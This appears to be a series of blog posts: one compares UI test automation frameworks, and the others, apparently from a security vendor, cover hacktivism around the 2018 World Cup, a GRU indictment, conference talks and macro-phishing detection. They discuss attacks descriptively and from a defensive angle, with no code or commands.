To select the final tool, I consulted with our FE team lead. He asked me to build a framework using WebdriverIO. WebdriverIO is currently the most popular and widely used browser automation tool for automated UI testing.

The “Bake-Off”

To measure the framework’s performance as well as the browser automation tool baked into it, I built three versions. Each version contained a duplicate set of smoke tests that verified: components on the login page, login functionality, navigation to all base pages, and components on each of our major functional pages.

To build each version, I used a structured process that consisted of the following steps:

Get the browser automation tool up and running by navigating to Google and verifying the page title.
Write test cases for each base page.
All tests and browser commands were written in the same file.
I executed the red/green refactor cycle, a process where tests are run and rewritten until it passes.
Decouple the browser commands from the test code. Our framework architecture replicates the component based structure of our front end codebase. Browser commands were written into its own component helper file duplicating the organization of our UI components. Organizing files in this way allows us to spend minimal time figuring out where to write tests and browser commands.
Request code reviews from our QA and FE teams and refactor framework code based on their feedback.

After each implementation, I graded the framework using categories informed by our testing strategy. Since the set of cases was limited to basic UI functionality, we focused on: architecture, speed, and browser compatibility.

Architecture was important to consider to ensure that the new framework would be compatible with our application and its surrounding infrastructure. Our FE team had experienced issues with Selenium, which automates the browser in a specific way. Both the FE and QA teams were open to exploring new automation tools that were architected in a different way.

Speed was paramount to framework performance. We want our tests to run efficiently and fast. To get an accurate measurement, each suite of tests was kicked off from the command line using the Linux time command. Many runs were captured, an average was generated and used for comparison.

We included browser compatibility as a category mainly to share my findings in discussions with the FE team. However, the set of tests we implemented did not rely on it. Users should be able to navigate through base and subpages regardless of browser type. Since Cypress is still new to the industry, WebdriverIO and NightwatchJS scored higher in this category. Fortunately, avid and enthusiastic support for Cypress has encouraged its developers to have a roadmap in place to extend support to all major browsers. In conjunction, we plan on continuing our manual testing process to evaluate our UI’s cross-browser functionality.

Based on these categories, if the framework version, along with its browser tool scored poorly, it received one point. If it scored well, two points. If it scored excellent, three points were given.

I concluded that browser automation tools that did not use Selenium (Cypress) outperformed Selenium-based tools (WebdriverIO & Nightwatch) in the following categories: architecture and speed.

See the Summary Comparison Chart below for a snapshot of my findings.

Summary Comparison Chart

In addition, Cypress scored highest for the fastest setup time, with built in and added features that innovate UI testing (Cypress). See the chart below for the overall score across a broader range of categories.

Overall Scoring

After analyzing the scores, I confidently recommended the version of the framework which used Cypress since it stood head and shoulders above the rest in almost all of the categories.

Lessons Learned

I conducted headless tests towards the end of the project for versions of our framework which used WebdriverIO and NightwatchJS. I ran into SSL certificate issues and was unable to redirect the automated browser to our login page. In hindsight, I would have preferred to run headed and headless tests together to solve SSL certificate issues concurrently.

In addition, I learned how a tool like Selenium automates the browser. Everytime a Selenium command is run, for example click, an HTTP request is created and sent to a browser driver. Selenium uses webdriver to communicate the click command to a browser-specific driver. Webdriver is a set of APIs responsible for establishing that communication with a browser-specific driver like geckodriver for Firefox. Geckodriver uses its own HTTP server to retrieve HTTP requests. The HTTP server determines the steps needed to run the click command. The click steps are executed on the browser. The execution status is sent back to the HTTP server. The HTTP server sends the status back to the automation script.

Lastly, I learned about innovations in browser automation. For instance, Cypress uses a Node.js server process to constantly communicate, synchronize, and perform tasks. The Node server intercepts all communications with the domain under test and its browser. The site being tested uses an iframed browser which Cypress controls. The test code executes together with the iframed code which allows Cypress to control the entire automation process from top to bottom, which puts it in the unique position of being able to understand everything happening in and outside of the browser.

Conclusion

Building an automated UI testing framework can make your UI testing scalable, reliable, efficient, cost-effective, and less brittle. To do so requires casting a wide net during the research process, collaborating with team mates to determine needs, obtaining experienced guidance, building a few versions using recommended browser automation tools, and assessing each version using thoughtful categories. This cyclical process can be applied when building other frameworks.

Through this process, I determined that the version of our framework which used a non-Selenium based tool (Cypress) was the most performant. Browser automation tools that customized their API to improve Selenium (WebdriverIO) outperformed its counterpart (NightwatchJS). While we still perform manual UI tests across various browsers, our automated UI testing framework provides a means for scalable, efficient and robust testing. With our new automated testing framework in place, when the FE team deploys a new build, our new automated UI testing framework will determine whether the build is functional enough for our manual testers to execute tests allowing us to increase our UI testing efficiency.

With seismic events already linked to the men’s World Cup, many wonder what other kinds of activities we may see. Cybersecurity discussions of the World Cup have largely focused on the criminal activity that tends to accompany major global events. In a recent survey, 72% of security professionals expect some sort of attack on this year’s tournament. The anticipated activities range from World Cup-related phishing schemes to device infiltration and surveillance. Many of these malicious activities were present during the men’s World Cup in Brazil four years ago.

In general, major political events, such as summits and sporting events, are generally prime targets for nefarious digital activity. This year’s Olympic Destroyer attack during the Winter Olympics is perhaps the most recent example. Given that the men’s World Cup is held in Russia, it is easy to assume Russia itself will not be a target. However, that may be a short-sighted assumption. Increasingly, anti-government groups in authoritarian states target various government-related institutions and events with distributed denial of service attacks (DDoS) or various forms of ‘cyber vandalism’ such as website defacement that may disrupt business activities. Taking a look at this broader trend provides insight into what kind of anti-government cyber activity may occur surrounding the men’s World Cup over the next month.

Anti-Government Protests & Digital Attacks

Numerous authoritarian governments - such as China, Iran, and Russia - are well-known for the level of sophistication of their state-affiliated cyber groups. What is less discussed is the rise of anti-government hacktivists within these and contiguous states. Anti-government groups employ various kinds of cyber attacks to achieve a variety of objectives. Their motivations range from protesting specific government policies or actions to spotlighting various kinds of corruption or illicit government activity. Of course, in some situations the government itself is not the target, but rather the activities of foreign governments operating within a country are targeted.

In the case of the men’s World Cup, while the Russian government may not be inclined to target the event itself, both anti-government groups or regional groups fending off Russian interference may very well want to wreak havoc throughout the month-long event. In fact, protests occurred in Brazil in 2014 over the high costs of the World Cup, and coincided with a string of anti-governments DDoS and spearphishing attacks. Let’s take a look at a few recent examples of this kind of activity.

Venezuela: In 2014, South American anons led an effort targeting government websites following the domestic uprising and protests sparked by increased government censorship and repression. The cyber attacks included both website defacement and DDOS attacks. This quickly turned into a widespread campaign dubbed OpVenezuela. More recently, the Binary Guardians claim to have hacked 40% of government sites in April 2017, again during a time of heightened tensions.
Iran: In May, an anti-government group hacked the airport system at an Iranian international airport in protest of military activities in the region. The group took control of the airport monitors and replaced it with anti-government content and a call to protests. They also took control of the email account of a civil aviation head to spread the news. Earlier this month, a group again disrupted an international airport, this time in Tabriz, by turning the monitors off. This is all occurring during a time of heightened censorship in Iran, including the recent extension of the ban on Telegram.

A Twitter Post from May 24, 2018

Ukraine: The Ukraine Cyber Alliance aims to counter Russian interference in Ukraine. The network of four groups - CyberHunta, Falcons Flame, Trinity, and RUH8 - targets the Kremlin, and aims to expose Russian interference abroad. Another group, InformNapalm, similarly targets Russia, and was created in response to the annexation of Crimea. The groups have compromised the Duma’s website, leaked emails, and published names of Russian military members, demonstrating a range of behavior all aimed at undermining the Kremlin. In some cases, both the Ukrainian government and other countries have condemned their behavior.
Lithuania: The broad impact of Russian trolls continues to garner much attention. To counter their activity, many Lithuanians have taken steps to disrupt the Russian propaganda with evidence-based campaigns. Known as the Elves, the group coordinates social media activity to counter the Russia disinformation. NATO has since made a video highlighting the anti-propaganda activity.

Digital Activism & the World Cup

Recently, a Ukrainian artist created a series of alternative World Cup posters to highlight Russian criminal activity and human rights violations. These spread quickly on the internet, and not surprisingly were a hit in Ukraine, but attacked in Russia. This kind of activity, however, may have copycats over the next month as the tournament progresses. With the recent Russian ban on Telegram disrupting major online activity and costing billions, the domestic environment is ripe for the kind of online protest behavior as we’ve seen elsewhere across the globe. This does not rule out the potential for a major attack of course - remember NotPetya also hit Russia as a self-imposed wound. However, when looking at motivations and resources required for various kinds of attacks, the greater likelihood are these kinds of anti-government cyber vandalism attacks with explicit messages and protests. While geopolitical tensions may seep into this global sporting event, most certainly we’ll see a series of epic goals, and epic dives, that will dominate online forums for remainder of the tournament.

Today’s indictment continues the uptick in the use of indictments to counter cyber attacks and disinformation which, in conjunction with automation, reflect the authoritarian playbook for interference operations. The indictment charges a dozen members of the Main Intelligence Directorate of the General Staff (GRU) with conducting “large-scale cyber operations to interfere with the 2016 U.S. presidential election”, including the Democratic National Committee (DNC) compromise. This is just the latest high-profile indictment against Russia for election interference and continues the steady beat of indictments against nation-state affiliates for cyber activity.

As the indictment details, the interference operation employed a series of phishing campaigns, credential theft, and malware to enable data exfiltration. The GRU members used these tactics persistently to compromise Clinton campaign employees and volunteers in addition to the DNC and DCCC compromise, created fake personas (DCLeaks and Guccifer 2.0), and maintained a series of computers located globally to mask their identity and location. The GRU members created fake Facebook and Twitter accounts to launch and promote DCLeaks-related information. Importantly, the indictment also notes the compromise of a vendor that verifies voter registration, reveals the theft of voter registration information of 500,000 voters by hacking state board of elections websites, and states that the GRU members conducted reconnaissance into county-level election websites in several states.

This global infrastructure was paid for in cryptocurrency, which is interesting as it is both a popular means for criminals to obfuscate attribution, and also because Russia previously considered creating its own national cryptocurrency (but later decided it was too risky and instead helped Venezuela create one to circumvent U.S. sanctions). The indictment details the use of both cryptomining as well as purchasing Bitcoin via currency exchanges.

This broad range of attacks and targets demonstrates the extreme coordination of Russian interference operations across the spectrum of influence, synchronizing bots, trolls, and cyber attacks as part of a coherent strategy. Given that the twelve individuals likely will never be arrested in the United States, many question the purpose of such indictments. As I’ve previously argued, indictments demonstrate the potential for attribution and the level of capabilities that can provide this evidence, help support a broader deterrence strategy, and have led to arrests previously when those indicted travel outside of Russia. In this case, the indictment can also help disrupt the financial apparatus funding the operation.

Importantly, this indictment also comes at a time when Russian interference operations extend well beyond elections and include compromise and/or reconnaissance of U.S. critical infrastructure, underwater cables that are core to trillions of dollars of transactions and communications, a global campaign targeting routers, not to mention the NotPetya attack which caused over a billion dollars in damage globally.

The timing is of course relevant with Monday’s summit between President Donald Trump and Russian President Vladimir Putin. Trump has stated that election interference will be discussed, but currently it appears issues such as Syria, Ukraine, the Middle East and nuclear proliferation will take precedent over any constructive discussion of further repercussions for Russian interference operations. As the U.S. increasingly employs a range of tools against numerous countries in response to interference operations, today’s indictment signals the vast level of detail and potential for attribution. It also demonstrates that a strategy of naming and shaming will continue in response to the spectrum of malicious digital activity, while potentially contributing to the much needed foundation for a broader deterrence strategy against this behavior.

In just a few weeks, the security industry will flock to Las Vegas for Black Hat, DEF CON, and BSides Las Vegas, also known as “Hacker Summer Camp”. It is one of the biggest weeks in security, and we’re excited to be active contributors at each of the conferences. Our team will be introducing some of our latest research, with presentations on everything from kernel mode threats to phishing detection through artificial vision systems to automated disassembly for malware analysis.

At Endgame, we believe contributing and collaborating with the community is essential to help elevate the game of defenders, and raise the costs for attackers. We’ll be sharing our independent research at each event, with two talks at Black Hat, one presentation and two workshops at DEF CON, and four talks at BSides Las Vegas. We also are sponsoring and giving a talk at the Diana Initiative, and hope to continue to elevate the voices of gender minorities in security.

Below are the abstracts, times, dates, and locations for our talks. We also will be at booth #1328 at Black Hat. Swing by and say hi and take a look at the Endgame platform, named Visionary by Gartner, and proven to empower even novice analysts to conduct complex and necessary security activities to protect against targeted attacks. See you in Vegas!

Endgame Presents:

BSidesLV

August 7-8

Tuscany Suites

Presentation:Stop and Step Away from the Data: Rapid Anomaly Detection via Ransom Note File Classification

Speaker:Mark Mager, Senior Malware Researcher

Date and Time:August 7, 3:00 PM

The proliferation of ransomware has become a widespread problem culminating in numerous incidents that have affected users worldwide. Current ransomware detection approaches are limited in that they either take too long to determine if a process is truly malicious or tend to miss certain processes due to focusing solely on static analysis of executables. To address these shortcomings, we developed a machine learning model to classify forensic artifacts common to ransomware infections: ransom notes. Leveraging this model, we built a ransomware detection capability that is more efficient and effective than the status quo.

I will highlight the limitations to current ransomware detection technologies and how that instigated our new approach, including our research design, data collection, high value features, and how we performed testing to ensure acceptable detection rates while being resilient to false positives. I will also be conducting a live demonstration with ransomware samples to demonstrate our technology's effectiveness. Additionally, we will be releasing all related source code and our model to the public, which will enable users to generate and test their own models, as we hope to further push innovative research on effective ransomware detection capabilities.

Presentation:Sight Beyond Sight: Detecting Phishing with Computer Vision

Speaker:Daniel Grant, Data Scientist

Date and Time: August 7, 5:00 PM

Even with all our advances in security and automated detection, the old cliché still holds true - users are the weakest link. Attacks are crafted to trick users into simple mistakes, such as clicking on a malicious link, enabling macros on a illegitimate document, or entering credentials on a masqueraded website. The best attackers exploit human perception and create reliable and consistent methods to gain unauthorized access to a system without needing to exploit technical vulnerabilities. Although some organizations invest in phishing training and simulation, relying on user attentiveness to detect all attacks that exploit visual similarities is bound to be incomplete. With that in mind, we’ll discuss the option of using machine learning to mimic human perception to detect the visual cues of phishing attacks.

Deep learning architectures have been used with great success to mimic or exceed human visual perception in well-scoped tasks ranging from identifying cats in Youtube videos to cars in self driving systems. Rarely have these techniques been applied to information security. Attacks that attempt to exploit human visual perception, such as phishing documents that persuade humans to enable malicious macros and URL (e.g., www. rnicrosoft.com) and file-based (e.g., chr0me.exe) homoglyph attacks, are ripe for similar automated analysis.

Our research introduces two methods - SpeedGrapher and Blazar - for leveraging artificial vision systems and features generated by image creation to detect phishing. SpeedGrapher analyzes the appearance of Microsoft (MS) Word documents via a preview from the Word Interop class to gather images of potential phishing attempts to enable macros and leverages an object detection network to identify relevant visual cues to classify the sample. Blazar analyzes strings for possible domain or filename spoofing and uses a siamese convolutional neural network and a nearest neighbor index to compare visual similarity of spoofs to known domain or file names with a much greater accuracy than edit distance techniques.

Examples of these methods in action will demonstrate the usefulness of integrating an artificial vision system approach to detect a range of phishing attacks, and we’ll provide some open source tools we’ve used and created in developing these approaches. [If 50 minutes] However, just as the human visual system can be tricked, these machine vision systems can also be exploited. We also show the risk and resilience of these vision systems to evasion attacks.

Presentation:Increasing Retention Capacity: Research from the Field

Speaker:Andrea Little Limbago, Chief Social Scientist

Date and Time:August 8, 11:00 AM

Why do organizations work so hard to recruit a talented workforce, but fall flat when it comes to retention? After all, rapid turnover negates investments in recruiting and training, stalls projects and innovation, and is often a gauge for the health of a company. Given the growing workforce deficit, it is essential to improve retention in security, especially among underrepresented groups. But what are those factors that improve and hinder retention in security? I conducted a survey and integrated existing social science research to identify those core factors. I will first describe the research design and the main findings. Next, and building upon existing social science research on social change and organizational structure, I will offer several concrete steps organizations can take to improve retention, including a nuanced approach to professional growth and addressing burnout, as well as key cultural factors within the workplace environment. This discussion also includes what the security industry writ large can do to help augment retention, especially when it comes to professional conferences, marketing, and some of the biases embedded in them.

Presentation: Who Maed Dis; A Beginners Guide to Malware Provenance Based on Compiler Type

Speaker:Lucien Brule, Malware Research Intern

Date and Time:August 8, 2:00 PM

Malware Researchers must take into account a wide range of factors in order to effectively triage, reverse, and address the threat of modern malware. Provenance, or being able to infer the origins of a given sample, is an important but often overlooked characteristic of most malware that may not be apparent to those entering this field. With added knowledge, and new tooling we can make our lives easier. Being able to determine the compiler provenance of a sample is valuable to a reverse engineer as it can speed up the detection of anomalous or otherwise interesting sections of a given binary. I’ll discuss how different compilers and build systems produce different Windows (PE) binaries, where ‘interesting’ bits of code exist across different kinds of binaries, their expected behaviour and defining characteristics and most importantly how to leverage this information to make heuristic conclusions that will improve one’s reverse engineering efficiency.

The talk also coincides with the public release of two things; 1. A package of Yara rules to fingerprint binaries by compiler type and 2. A tool which facilitates the analysis of a given binary by providing a graphic and diagnostic output that can denote malicious and benign segments. This tool acts as a hinting system to a researcher so they can spend less time searching through boring segments of code and more time looking at interesting segments. The tool, combined with the yara rules empower one to extend their own definitions and provide definitions for that which they deem interesting.

Black Hat

August 8-9

Mandalay Bay

Presentation:Finding Xori: Malware Analysis Triage with Automated Disassembly

Speakers: Amanda Rousseau (Senior Malware Researcher) and Rich Seymour (Senior Data Scientist)

Date and Time: August 8, 10:30 AM, South Seas CDF

In a world of high volume malware and limited researchers, we need a dramatic improvement in our ability to process and analyze new and old malware at scale. Unfortunately, what is currently available to the community is incredibly cost prohibitive or does not rise to the challenge. As malware authors and distributors share code and prepackaged tool kits, the white hat community is dominated by solutions aimed at profit as opposed to augmenting capabilities available to the broader community. With that in mind, we are introducing our library for malware disassembly called Xori as an open source project. Xori is focused on helping reverse engineers analyze binaries, optimizing for time and effort spent per sample.

Xori is an automation-ready disassembly and static analysis library that consumes shellcode or PE binaries and provides triage analysis data. This Rust library emulates the stack, register states, and reference tables to identify suspicious functionality for manual analysis. Xori extracts structured data from binaries to use in machine learning and data science pipelines.

We will go over the pain-points of conventional open source disassemblers that Xori solves, examples of identifying suspicious functionality, and some of the interesting things we've done with the library. We invite everyone in the community to use it, help contribute and make it an increasingly valuable tool in this arms race.

Presentation:Kernel Mode Threats and Practical Defenses

Speakers: Gabriel Landau (Principal Software Engineer) and Joe Desimone (Senior Malware Researcher)

Date and Time: August 9, 9:45 AM, South Seas ABE

Recent advancements in OS security from Microsoft such as PatchGuard, Driver Signature Enforcement, and SecureBoot have helped curtail once-widespread commodity kernel mode malware such as TDL4 and ZeroAccess. However, advanced attackers have found ways of evading these protections and continue to leverage kernel mode malware to stay one step ahead of the defenders. We will examine the techniques from malware such as DoublePulsar, SlingShot, and Turla that help attackers evade endpoint defenses. We will also reveal a novel method to execute a fully kernel mode implant without hitting disk or being detected by security products. The method builds on publicly available tools which makes it easily within grasp of novice adversaries.

While attacker techniques have evolved to evade endpoint protections, the current state of the art in kernel malware detection has also advanced to hinder these new kernel mode threats. We will discuss these new defensive techniques to counter kernel mode threats, including real-time detection techniques that leverage hypervisors along with an innovative hardware assisted approach that utilizes performance monitoring units. In addition, we will discuss on-demand techniques that leverage page table entry remapping to hunt for kernel malware at scale. To give defenders a leg up, we will release a tool that is effective at thwarting advanced kernel mode threats. Kernel mode threats will only continue to grow in prominence and impact. This talk will provide both the latest attacker techniques in this area, and a new tool to curtail these attacks, proving real-world strategies for immediate implementation.

DEF CON

August 9-12

Caesar’s Palace

Presentation: Finding Xori: Malware Analysis Triage with Automated Disassembly

Speakers: Amanda Rousseau (Senior Malware Researcher) and Rich Seymour (Senior Data Scientist)

Date and Time: August 10, 1:00 PM, Track 2

Workshop: AI Village

Endgame Speakers: Bobby Filar (Principal Data Scientist), Hyrum Anderson (Technical Director- Data Science), Amanda Rousseau (Senior Malware Researcher), Mark Mager (Senior Malware Researcher), Sven Cattell (Data Scientist)

Dates: August 10-12, Caesar’s Palace

The AI Village at DEF CON is a place where experts in AI and security (or both!) can come together to learn and discuss the use, and misuse, of artificial intelligence in traditional security. Artificial Learning techniques are rapidly being deployed in core security technologies like malware detection and network traffic analysis, but their use has also opened up a variety of new attack vectors against the systems that use them. Using techniques such as Generative Adversarial Networks, would-be attackers could target non-traditional platforms, such as deep learning based image recognition systems used in self driving cars. These same attack methods could be leveraged to extract confidential training data from a deployed model itself, adding another layer of privacy and security risks to an ever-growing list of concerns.

The AI Village will explore these issues and encourage open discussion for possible solutions (and any interesting attacks the attendees can come up with). For those who would rather learn through practice, a practice workshop session will also be available.

Come participate in introductory workshops where you can learn how to use (and misuse!) machine learning models as part of your arsenal. Talks include:

A discussion of the recently released report on the Malicious Use of AI
Red-teaming machine learning systems using adversarial techniques
Vulnerabilities of machine learning tools
(ICYMI) Mark Mager’s BSidesLV talk on ransom note file classification and detection

Workshop: Reverse Engineering Malware 101 (Part of Packet Hacking Village & Workshop)

Speaker: Amanda Rousseau, Senior Malware Researcher

Date and Time: August 10, 11-12:30, Caesar’s Palace, Promenade Level

This workshop provides the fundamentals of reversing engineering (RE) Windows malware using a hands-on experience with RE tools and techniques. Attendees will be introduced to RE terms and processes, followed by basic x86 assembly, and reviewing RE tools and malware techniques. It will conclude by attendees performing a hands-on malware analysis that consists of Triage, Static, and Dynamic analysis.

Prerequisites: Basic understanding of programming C/C++, Python, or Java.

Provided: A virtual machine and tools will be provided.

Features: 5 Sections in 1.5 hours:

~15 min Fundamentals
~15 min Tools/Techniques
~30 min Triage Static Analysis + Lab
~30 min Dynamic Analysis + Lab

The Diana Initiative

August 9-10

Caesar’s Palace

Presentation: Yes You Can: An Interactive Discussion on CFP Submissions and Presenting at Cons

Speakers: Andrea Little Limbago, Chief Social Scientist and Kathleen Smith, Chief Marketing Officer at ClearedJobs.net & CyberSecJobs.com

Date and Time: August 9, 1:30 PM, Track 2

There are (at least) two common and inter-related misperceptions that continue to limit female participation on conference panels and as speakers. First, many conference organizers contend there simply aren’t enough women in the field. Second, many women believe they do not possess the expertise or qualifications to speak at conferences, or even meetups. Neither of these are true, but they reinforce the persistent dearth of technical women speaking at technical conferences. This is especially problematic in security, where we need more visible and prominent women. Moreover, conference participation is a great way to build your brand, grow professionally, and receive useful feedback for a project or research. In this discussion, we’ll share lessons learned and writing tips for pursuing technical speaking opportunities. Participants will leave equipped with the tools and encouragement required to move the needle for greater female speaker representation at security conferences.

In early August, security practitioners from around the world will descend upon Las Vegas for a week of talks, demos, and CTFs. The conference lineup of BSides Las Vegas, Black Hat, and DEF CON provides an excellent compendium of topics for novices and the experienced alike. Over the past three years, machine learning (ML) and artificial intelligence (AI) have grown in both discussion and application. Given the growing focus on AI and ML in infosec, it is only natural that a new village focused on AI would be introduced this year at DEF CON. DEF CON has a range of villages, including those on IoT, social engineering, and voting machine hacking, making it an ideal venue to launch something like AI Village.

The AI Village is a place where practitioners in AI and security (or both!) can come together to learn and discuss the use, and misuse, of artificial intelligence in information security. As AI becomes more common in security platforms, there will be an expectation of knowledge and understanding of how these platforms work and any security risks that AI may introduce. The village will address these issues, help bridge the gap between security practitioners and machine learning researchers, and provide a welcoming home for both at DEF CON.

The talks scheduled over the 2.5 days range from adversarial machine learning to using the latest deep learning techniques to identify phishing/exploits/ransomware. Additionally, the village will host two panel discussions on core infosec/ML topics: 1) Offensive Machine Learning; and 2) Malware Analysis and Machine Learning. Endgame’s Bobby Filar (@filar) will join other industry experts on the first panel to discuss what ethical boundaries and limits may be required for offensive use cases of ML and to prevent incidental damage. Endgame’s Amanda Rousseau (@malwareunicorn) and Hyrum Anderson (@drhyrum) will participate on the second panel to address challenges with ML in infosec by providing the practitioner and data science perspective, respectively.

The village also will be holding a Capture-the-Flag inspired event to teach attendees a wide range of ML/AI topics. The beginner challenges have walkthroughs to help hackers get started with adversarial AI and other machine learning topics at their own pace with volunteers standing by to help. The upper limits of the categories have tough questions that will test participants ability to understand and execute model attacks and defenses while working with security data. AI Village will draw on numerous open source security data sources, including the classifier and data set, Ember, which Endgame released this past spring.

If you’ll be attending, be sure to stop by the village and meet our team. We are very excited for the first of hopefully many AI Villages at DEF CON, and to have an opportunity to share our perspective on the numerous topics that must be explored as ML continues to redefine information security.

With version 3.0 of the Endgame Protection Platform, Endgame has delivered the best prevention against document-based phishing attacks - the execution of malicious documents attached to email or delivered through social channels. Combined with existing layers of built-in protection, Endgame 3.0 eliminates this major vector of attack while continuing our commitment to transparency, and improving security for customers and the security community. Today, the machine learning component of this technology, the first of its kind, is running publicly in Google’s VirusTotal.

The Prevalence of Phishing for Payload Delivery

While there are two main strategies for phishing, phishing for credentials and phishing for payload delivery and access, the latter has been the initial attack vector in this year’s high profile attacks on the World Cup, Pyeongchang Winter Olympics, financial, chemical and biological threat prevention labs, and election interference. Research by Verizon makes it clear that document-based phishing remains a prevalent and extremely successful tactic by both criminal groups and nation-states to achieve a range of objectives, from financial gain to espionage to destruction. Targets include not only heads of organizations and individuals with obvious access to the most sensitive information, but people across an organization who can be used as a means to an end.

Phishing for payload delivery and access is the most direct and reliable way to get attacker code on a user’s machine inside a target of interest. From that position in a network, an adversary can perform reconnaissance, move laterally, and take desired actions on objectives ranging from data theft to destruction. Damage from attacks can be accrued over months and even years, with severe losses as a result.

Defenses against phishing for payload delivery have focused on user training, mail and web filtering, or knowledge of specific malware or attack infrastructure protecting against what is known of previous attacks. As the success of recent attacks shows, this isn’t working. More must be done to cut off this vector of initial access. Reimagining phishing protection requires a shift. We need to assume that despite best efforts to filter messages and train users, messages will get through and users will click. To eliminate this access vector, we must more reliably prevent unknown malicious payloads sent to users.

The Endgame Approach to Document-Based Phishing

Phishing protection has been a cat and mouse game which defenders are losing, with attackers reliably finding ways around approaches focused on filtering, knowledge of infrastructure, and looking for specific malware payloads. Robust and resilient phishing prevention should not focus only on the delivery and the click, but also on stopping the payload. Current approaches do not effectively prevent novel payloads from running. Endgame revolutionizes payload prevention, protecting customers against both macro-based and non-macro based phishing attacks designed to gain initial access to a computer or network.

Defending Against Macro-Based Phishing Attacks

Macro-based phishing attacks are those that deceive victims into downloading a malicious document and enabling malicious embedded scripts to run, usually by clicking on an “Enable Macros” button within a Microsoft Office document. To counter these attacks, Endgame has enhanced its machine learning technology MalwareScore™ to prevent execution of documents carrying malicious MS Office macros. Following on the heels of Endgame’s other machine learning based MalwareScore protections - Windows PE files and Mac executable files - our latest innovation applies machine learning to protect against malicious macros, one of the most impactful security challenges.

MalwareScore combines the expertise of Endgame’s malware researchers and data scientists in a single, lightweight model which provides unparalleled protection against known and unknown macro-based attacks. Detecting malicious macros using machine learning introduced numerous unique challenges, which we discuss further here. Confident in our approach to macro-detection, Endgame has also released this enhancement into VirusTotal as part of our commitment to transparency and growing the community.

Defending Against Non-Macro Based Document Phishing Attacks

There are other ways to deliver a malicious payload via a document. Weaponized software vulnerabilities pop up regularly, and attackers can attempt to gain access through exploitation. Endgame provides great exploitation protection. There are also legitimate features beyond macros that are abused by attackers to execute code. For instance, the criminal group Fin7 has exploited legacy features in Microsoft applications such as Dynamic Data Exchange. To address these less common payloads, Endgame provides a broad and deep set of signatureless capabilities which provide unparalleled protection around applications commonly targeted by attackers. This set of protections also provides a layer of defense for the 1% of malicious macros which will get through MalwareScore. Effective endpoint defenses require layers operating together.

Making Clicking Safe Again

As long as phishing remains a lucrative, inexpensive, and high-return approach, criminals and nation-state attackers will continue to innovate, causing major financial, political, and potentially physical destruction. Endgame alters this risk calculus by protecting against those document-based phishing attacks with and without macros, stopping the attackers before data loss or destruction can occur. We’re excited to introduce this enhancement to our machine learning technology simultaneously making it available for public access in Google’s VirusTotal and to commercial customers as part of the launch of Endgame Release 3.0.

If you’ll be at Black Hat, swing by our booth #1328 for hourly demonstrations of our multilayer endpoint protection platform. We will show how Endgame stops attacks pre-execution, orchestrates the quarantine and clean up of all endpoints and removal from email servers, stopping all clickers, and future clickers.

Phishing continues to be one of the most effective methods of compromise according to Verizon’s Data Breach Investigations Report. Adversaries often use crafted documents containing malicious macros and a deceptive lure to achieve initial access to target users and networks. These macro-based attacks remain difficult to stop for numerous reasons. Adversaries are becoming more clever with their phishing schemes, and mail filtering will never stop a determined adversary from delivering payloads to inboxes. In addition, human nature and a lot of history tells us that users will open and interact with malicious attachments. Finally, security products do a poor job in providing the necessary safety net of detection and prevention without prior knowledge of the specific attack.

Today, we are introducing MalwareScore for macros - a machine learning-based detector for malicious macro-enabled Microsoft Office documents - to protect against phishing designed to gain a foothold on a targeted system. This new capability was just released into VirusTotal and prevents compromise before malicious macro documents are even opened. Endgame already provides extensive signatureless protection against this class of attack, including prevention against documents exploiting a vulnerability in rendering software like Adobe Reader or Microsoft Word, inline protections against non-macro attacks, tradecraft analytics on suspicious behaviors of commonly targeted software like Office, and our full suite of protections against payloads delivered via the initial macro-based attack. With the addition of MalwareScore for macros, Endgame provides unparalleled protection against phishing campaigns with macro-enabled documents that seek to gain access to endpoints.

World, Meet MalwareScore for Macros

Endgame has already proven excellence in known and unknown malware detection with MalwareScore for Windows PE files and Mac executable files. To counter malicious macros, Endgame Research built MalwareScore for macros, a static machine-learning driven malware protection for malicious Office macros. This high-efficacy macro malware classifier was released today in VirusTotal and will soon be available to Endgame customers in our 3.0 product release.

In creating MalwareScore for macros, we applied many lessons-learned from building and maintaining MalwareScore for Windows and Mac. However, creating a classifier for macros has its own quirks and challenges to overcome. There are multiple file types to consider, unique issues related to file similarity, totally new feature engineering requirements, difficulty in gathering large benign and malicious datasets, and difficulty generating high quality labels on the training and test data. These are just a few of the challenges we encountered. Before addressing how we overcame each of these challenges in creating MalwareScore for macros, let’s take a quick look at why this protection is so essential in the first place.

Macros Gone Bad

Visual Basic for Applications (VBA) has been used in Office documents since it was introduced in Excel in 1993. One of the first widespread macro viruses, Melissa, appeared in 1999 and forced several tech giants to shut down their email systems to prevent the virus from spreading. Since then, malicious Word and Excel documents with seemingly important information have been flowing freely to inboxes everywhere with cleverly constructed content encouraging the user to click “Enable Content”. The most effective of today’s macro-enabled attacks are not the easy to spot scam emails of previous eras, but rather are extremely sophisticated. They leverage everything from modifications to real documents to the vast wealth of personal information available online to blurry text and fake mentions of unlocking encryption to successfully deliver both targeted and widespread phishing attacks.

Email remains the most frequent delivery mechanism for phishing attacks, but social media also is an increasingly popular attack vector. Groups such as Iran’s Cobalt Gypsy/Oil Rig target individuals at strategic organizations, connecting with them via social media and eventually convincing them to download malicious macro-enabled documents onto their corporate networks. Earlier this year, the Pyeongchang Winter Olympics served as a decoy to target organizations with a macro-based phishing campaign, hoping the malicious document would enable compromise and access to corporate information. APT28 and other aggressive Russian actors have consistently used macro-enabled documents to gain access to their highest value targets in the US and abroad.

We could cite dozens or hundreds of additional examples, but campaigns have similarities. The weaponized macro-based documents often evade detection because they are multi-stage, take advantage of legitimate functionality within Windows and the Office toolsuite, and leverage credible-looking user prompts for execution. Given how frequently the attack documents change and how legitimate these attacks appear, a machine learning-based classification approach can drastically improve prevention rates when modeled carefully and robustly. However, this is not a trivial task.

Challenges with Creating A Macro-Based Classifier

When creating a macro-based classifier, there are a range of unique considerations. Many years of evolving versions of Office which the classifier must support, several distinct file types, and the absence of trustworthy labels on samples, especially newly in-the-wild malicious documents, are some of the special challenges to overcome. There also are the typical considerations of guaranteeing high detection efficacy, negligible false positives, and performing at scale and speed. I’ll address four of the most important challenges we solved when creating this new capability: 1) Parsing macros effectively; 2) Feature engineering; 3) Lack of solid labels; and 4) Identifying similar samples across different documents.

Parsing macros effectively

Parsing macro-enabled Office docs is an exercise in enumeration and iteration. Not only are there multiple file types such as Word documents, Excel spreadsheets, and other document types to deal with, there are also multiple Office versions that have different ideas of file structure. Pre-2007 Office versions use a binary file format whereas those after 2007 use an XML file format, which is effectively a zip file to house the contents.

